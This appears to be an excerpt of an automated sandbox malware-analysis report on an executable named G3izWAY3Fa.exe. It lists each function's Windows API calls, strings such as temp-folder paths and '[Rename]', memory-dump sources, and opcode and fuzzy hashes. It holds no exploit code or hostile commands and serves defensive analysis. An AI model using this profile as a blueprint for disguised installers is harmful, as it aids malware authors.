                                • API String ID: 2035342205-2680054973
                                • Opcode ID: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
                                • Instruction ID: 4b200e60d3e8d58e0ab6cbb93b3ca9934a2dcfa31e3b076817fab6d13423d761
                                • Opcode Fuzzy Hash: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
                                • Instruction Fuzzy Hash: 45511230844A48B6DB226B228C45BFF3A78DF4275AF14813BF845751D1C77C4981DE6E
                                Function 004059FF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetVersion.KERNEL32(?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405AA7
                                • GetSystemDirectoryA.KERNEL32(open C:\Windows\temp\Edit9,00000400), ref: 00405B22
                                • GetWindowsDirectoryA.KERNEL32(open C:\Windows\temp\Edit9,00000400), ref: 00405B35
                                • SHGetSpecialFolderLocation.SHELL32(?,0040F020), ref: 00405B71
                                • SHGetPathFromIDListA.SHELL32(0040F020,open C:\Windows\temp\Edit9), ref: 00405B7F
                                • CoTaskMemFree.OLE32(0040F020), ref: 00405B8A
                                • lstrcatA.KERNEL32(open C:\Windows\temp\Edit9,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BAC
                                • lstrlenA.KERNEL32(open C:\Windows\temp\Edit9,?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405BFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open C:\Windows\temp\Edit9
                                • API String ID: 900638850-3049956873
                                • Opcode ID: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                • Instruction ID: d3edd175ae4d098aa1e1d30cbcff8d3f456ad99068bf2b680a9da6a8a672f2a4
                                • Opcode Fuzzy Hash: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                • Instruction Fuzzy Hash: 30511471A04A04ABEB215F68DC84B7F3BB4EB55324F14423BE911B62D1D27C6981DF4E
                                Function 00402020 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409348,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID: C:\Windows\temp
                                • API String ID: 123533781-823764690
                                • Opcode ID: 2dd538ee9b8a3d7f9f3516468ec66178ea648c363e8e90f8139c66e2dda502c8
                                • Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
                                • Opcode Fuzzy Hash: 2dd538ee9b8a3d7f9f3516468ec66178ea648c363e8e90f8139c66e2dda502c8
                                • Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                Function 00405CD8 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(?,004224C8,00421880,004055F4,00421880,00421880,00000000,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405CE3
                                • FindClose.KERNEL32(00000000), ref: 00405CEF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID:
                                • API String ID: 2295610775-0
                                • Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                • Instruction ID: 9a18407f5d3c0b203e51d924b64f4f6f4a008a27543408caa796c3d3b713bef8
                                • Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                • Instruction Fuzzy Hash: 91D0C93594D620ABD6012728AD0884B6A589B153317508B32F46AE22E0C7748C529AA9
                                Function 0040263E Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: f3d53191a6114d87a635ba583fb771baa2153c083736da5485a901926fc49706
                                • Instruction ID: 14dcf34609860af9969e045d3f077fc7a18bb2554c958aa599433bfc977b1d94
                                • Opcode Fuzzy Hash: f3d53191a6114d87a635ba583fb771baa2153c083736da5485a901926fc49706
                                • Instruction Fuzzy Hash: 86F0E572A04101DFD700EBB49E49AEEB778DF51328FA0067BF101F20C1D2B84A45DB2A
                                Function 004038BC Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
                                • ShowWindow.USER32(?), ref: 00403915
                                • DestroyWindow.USER32 ref: 00403929
                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403945
                                • GetDlgItem.USER32(?,?), ref: 00403966
                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040397A
                                • IsWindowEnabled.USER32(00000000), ref: 00403981
                                • GetDlgItem.USER32(?,00000001), ref: 00403A2F
                                • GetDlgItem.USER32(?,00000002), ref: 00403A39
                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403A53
                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AA4
                                • GetDlgItem.USER32(?,00000003), ref: 00403B4A
                                • ShowWindow.USER32(00000000,?), ref: 00403B6B
                                • EnableWindow.USER32(?,?), ref: 00403B7D
                                • EnableWindow.USER32(?,?), ref: 00403B98
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
                                • EnableMenuItem.USER32(00000000), ref: 00403BB5
                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BCD
                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BE0
                                • lstrlenA.KERNEL32(00420478,?,00420478,00423680), ref: 00403C09
                                • SetWindowTextA.USER32(?,00420478), ref: 00403C18
                                • ShowWindow.USER32(?,0000000A), ref: 00403D4C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                • String ID:
                                • API String ID: 184305955-0
                                • Opcode ID: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                • Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
                                • Opcode Fuzzy Hash: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                • Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E
                                Function 00403ED7 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F62
                                • GetDlgItem.USER32(00000000,000003E8), ref: 00403F76
                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F94
                                • GetSysColor.USER32(?), ref: 00403FA5
                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FB4
                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FC3
                                • lstrlenA.KERNEL32(?), ref: 00403FCD
                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FDB
                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FEA
                                • GetDlgItem.USER32(?,0000040A), ref: 0040404D
                                • SendMessageA.USER32(00000000), ref: 00404050
                                • GetDlgItem.USER32(?,000003E8), ref: 0040407B
                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040BB
                                • LoadCursorA.USER32(00000000,00007F02), ref: 004040CA
                                • SetCursor.USER32(00000000), ref: 004040D3
                                • ShellExecuteA.SHELL32(0000070B,open, .B,00000000,00000000,00000001), ref: 004040E6
                                • LoadCursorA.USER32(00000000,00007F00), ref: 004040F3
                                • SetCursor.USER32(00000000), ref: 004040F6
                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404122
                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404136
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                • String ID: .B$N$open
                                • API String ID: 3615053054-847860968
                                • Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                • Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
                                • Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                • Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98
                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                • BeginPaint.USER32(?,?), ref: 00401047
                                • GetClientRect.USER32(?,?), ref: 0040105B
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                • DeleteObject.GDI32(?), ref: 004010ED
                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                • DrawTextA.USER32(00000000,00423680,000000FF,00000010,00000820), ref: 00401156
                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                • DeleteObject.GDI32(?), ref: 00401165
                                • EndPaint.USER32(?,?), ref: 0040116E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F
                                • API String ID: 941294808-1304234792
                                • Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                • Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
                                • Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                • Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5
                                Function 0040572B Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                  • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                  • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
                                • GetShortPathNameA.KERNEL32(?,00422608,00000400), ref: 00405781
                                • GetShortPathNameA.KERNEL32(00000000,00422080,00000400), ref: 0040579E
                                • wsprintfA.USER32 ref: 004057BC
                                • GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
                                • GlobalFree.KERNEL32(00000000), ref: 0040587B
                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882
                                  • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                  • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                • String ID: %s=%s$[Rename]
                                • API String ID: 3772915668-1727408572
                                • Opcode ID: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                • Instruction ID: 243778ea09c2d6121d89995a0746b628a30f71b2b4e684d8516dd3187c24d480
                                • Opcode Fuzzy Hash: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                • Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE
                                Function 00405C3F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                • CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 589700163-1663183005
                                • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                • Instruction ID: 6e21827f4117d195ccc2fee92ee9dbca2865e9be55a4e6ca6148cbd3e4a13511
                                • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                • Instruction Fuzzy Hash: F011905580CB942AFB3206384C48B776F99CB67764F58407BE8C4723C2D67C5C429B6D
                                Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowLongA.USER32(?,000000EB), ref: 00403E13
                                • GetSysColor.USER32(00000000), ref: 00403E2F
                                • SetTextColor.GDI32(?,00000000), ref: 00403E3B
                                • SetBkMode.GDI32(?,?), ref: 00403E47
                                • GetSysColor.USER32(?), ref: 00403E5A
                                • SetBkColor.GDI32(?,?), ref: 00403E6A
                                • DeleteObject.GDI32(?), ref: 00403E84
                                • CreateBrushIndirect.GDI32(?), ref: 00403E8E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                • Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
                                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                • Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95
                                Function 0040267C Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
